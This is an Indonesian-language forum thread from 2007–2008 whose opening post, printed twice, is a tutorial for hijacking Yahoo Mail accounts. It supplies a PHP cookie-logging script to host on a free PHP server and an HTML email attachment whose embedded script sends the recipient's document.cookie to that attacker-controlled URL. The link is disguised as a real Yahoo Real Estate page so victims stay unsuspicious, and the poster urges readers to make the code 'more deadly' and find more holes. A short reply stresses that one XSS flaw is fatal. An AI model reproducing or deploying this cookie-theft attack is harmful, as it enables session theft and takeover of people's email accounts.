Yahoo Hacking Technique v.2.0
2 posters
Page 1 of 1
Yahoo Hacking Technique v.2.0
by dr.vaako Mon Nov 05, 2007 9:50 pm
Hmm ..
Seperti yang telah saya katakan sebelum nya ..
Yahoo masih
memiliki banyak kebocoran ..
Saya tidak akan memberitahukan secara lgsg apa
yang sebenarnya mereka patch, namun saya akan menunjukan lagi .. Sebuah karya
yang bisa dikatakan sebagai satu lagi kebocoran yang ada pada Yahoo! Mail System
..
Berikut adalah Tutorialnya
Pertama tama anda harus memiliki code ini:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');
$fl =
fopen('output.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer."
:: ".$cookie."\n");
fclose($fl);
?>
Yang perlu anda lakukan adalah:
1. Melakukan copy-paste script diatas
kedalam Notepad ..
2. Lakukan 'save as' dan simpanlah script diatas dengan
nama c.php ..
3. Buatlah sebuah file text kosong bernama output.txt ..
4. Hostingkan di hosting yang bisa menerima PHP .. (Example: http://www.byethost.com/) -
Hosting berbayar juga direkomendasikan ..
Setelah siap dengan persiapan
tahap 1 ..
Yang perlu anda lakukan adalah memiliki code ini:
<div id=yiv1052512133><a target="_blank" rel="nofollow" _
href="http://realestate.yahoo.com/New_York/Schenectady/Homes_for_sale/result.html;_ylt=Auxh9be9E69K5l8hdmj.PAbnMrQs?typeBak=realestate&p=Schenectady,+NY&type=classified&search=Search&priceLow=&priceHigh=&bedroomLow=1&bathroomLow=1.0"><script>location.href='http://shinigami.byethost32.com/c.php?c='+document·cookie</script>"
>
Click Here .. !!!</a></div>
Lalu yang perlu anda lakukan adalah:
1. Lakukanlah copy-paste ke dalam
notepad ..
2. Ubah http://shinigami.byethost32.com/c.php .. Menjadi alamat web
tempat kamu menaruh c.php file kamu .. (Misal: http://saya.keren.org/c.php) ..
3. Lakukan 'save as' dan
simpan dengan format <nama>.html ..
Siap dengan ke 2 hal diatas,
yang perlu anda lakukan selanjutnya adalah megirimkan file *.html yang anda buat
dengan script diatas tadi melalui attachment pada Yahoo! email system .. Orang
yang menerima email itu akan melihat sebuah hyperlink bertuliskan "Click Here ..
!!!" (Tanpa Kutip) .. Dan sewaktu mereka melakukan clicking, mereka akan
ter-redirect ke page RealEstate Yahoo! (Yang notabene masih RESMI MILIK YAHOO)
.. Sehingga mereka tidak begitu curiga .. Akan tetapi, cookies mereka akan
tersimpan di output.txt yg ter hostkan di hosting kalian xD~~
Catatan Penting
- Script2 yang saya berikan
diatas bisa dimodifikasi menjadi lebih mematikan .. Hanya perlu sedikit
modifikasi saja xD~~
- Link RealEstate Yahoo bukan 1 1 nya yang dapat
digunakan untuk main2 hal semacam ini xD~~ .. Be creative and find more for
urself .. xD~~
- Attachment bukanlah 1 1 nya jalan yang dapat di exploitasi
dengan tehnik sejenis ini .. Tidak begitu sulit untuk menemukan 2 buah hole
lainnya yang mgkn ter-exploitasi dengan jenis serangan sejenis ini xD~~
Catatan Tambahan
- Masih ada
beberapa jenis exploit lagi yang bekerja pada Yahoo ..
- Kesemuannya
bukanlah sesuatu yang HELL DIFFICULT untuk diketemukan .. Ayooo!!! Berusaha lagi
teman teman xD~~
Seperti yang telah saya katakan sebelum nya ..
Yahoo masih
memiliki banyak kebocoran ..
Saya tidak akan memberitahukan secara lgsg apa
yang sebenarnya mereka patch, namun saya akan menunjukan lagi .. Sebuah karya
yang bisa dikatakan sebagai satu lagi kebocoran yang ada pada Yahoo! Mail System
..
Berikut adalah Tutorialnya
Pertama tama anda harus memiliki code ini:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');
$fl =
fopen('output.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer."
:: ".$cookie."\n");
fclose($fl);
?>
Yang perlu anda lakukan adalah:
1. Melakukan copy-paste script diatas
kedalam Notepad ..
2. Lakukan 'save as' dan simpanlah script diatas dengan
nama c.php ..
3. Buatlah sebuah file text kosong bernama output.txt ..
4. Hostingkan di hosting yang bisa menerima PHP .. (Example: http://www.byethost.com/) -
Hosting berbayar juga direkomendasikan ..
Setelah siap dengan persiapan
tahap 1 ..
Yang perlu anda lakukan adalah memiliki code ini:
<div id=yiv1052512133><a target="_blank" rel="nofollow" _
href="http://realestate.yahoo.com/New_York/Schenectady/Homes_for_sale/result.html;_ylt=Auxh9be9E69K5l8hdmj.PAbnMrQs?typeBak=realestate&p=Schenectady,+NY&type=classified&search=Search&priceLow=&priceHigh=&bedroomLow=1&bathroomLow=1.0"><script>location.href='http://shinigami.byethost32.com/c.php?c='+document·cookie</script>"
>
Click Here .. !!!</a></div>
Lalu yang perlu anda lakukan adalah:
1. Lakukanlah copy-paste ke dalam
notepad ..
2. Ubah http://shinigami.byethost32.com/c.php .. Menjadi alamat web
tempat kamu menaruh c.php file kamu .. (Misal: http://saya.keren.org/c.php) ..
3. Lakukan 'save as' dan
simpan dengan format <nama>.html ..
Siap dengan ke 2 hal diatas,
yang perlu anda lakukan selanjutnya adalah megirimkan file *.html yang anda buat
dengan script diatas tadi melalui attachment pada Yahoo! email system .. Orang
yang menerima email itu akan melihat sebuah hyperlink bertuliskan "Click Here ..
!!!" (Tanpa Kutip) .. Dan sewaktu mereka melakukan clicking, mereka akan
ter-redirect ke page RealEstate Yahoo! (Yang notabene masih RESMI MILIK YAHOO)
.. Sehingga mereka tidak begitu curiga .. Akan tetapi, cookies mereka akan
tersimpan di output.txt yg ter hostkan di hosting kalian xD~~
Catatan Penting
- Script2 yang saya berikan
diatas bisa dimodifikasi menjadi lebih mematikan .. Hanya perlu sedikit
modifikasi saja xD~~
- Link RealEstate Yahoo bukan 1 1 nya yang dapat
digunakan untuk main2 hal semacam ini xD~~ .. Be creative and find more for
urself .. xD~~
- Attachment bukanlah 1 1 nya jalan yang dapat di exploitasi
dengan tehnik sejenis ini .. Tidak begitu sulit untuk menemukan 2 buah hole
lainnya yang mgkn ter-exploitasi dengan jenis serangan sejenis ini xD~~
Catatan Tambahan
- Masih ada
beberapa jenis exploit lagi yang bekerja pada Yahoo ..
- Kesemuannya
bukanlah sesuatu yang HELL DIFFICULT untuk diketemukan .. Ayooo!!! Berusaha lagi
teman teman xD~~
dr.vaako- mahasiswa
-
Number of posts : 36
Location : spooky island
Registration date : 2007-10-30
Re: Yahoo Hacking Technique v.2.0
by Fauzano Thu Jan 31, 2008 12:57 am
Pada dasarnya, pada kebanyakan website yang memiliki email service,
adanya 1 saja page pada entire website mereka yang memiliki celah XSS,
akan berakibat FATAL .. !!!
So, jgn anda pikir klo situs besar selalu aman...
adanya 1 saja page pada entire website mereka yang memiliki celah XSS,
akan berakibat FATAL .. !!!
So, jgn anda pikir klo situs besar selalu aman...
Fauzano- mahasiswa
- Number of posts : 2
Registration date : 2007-11-16
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum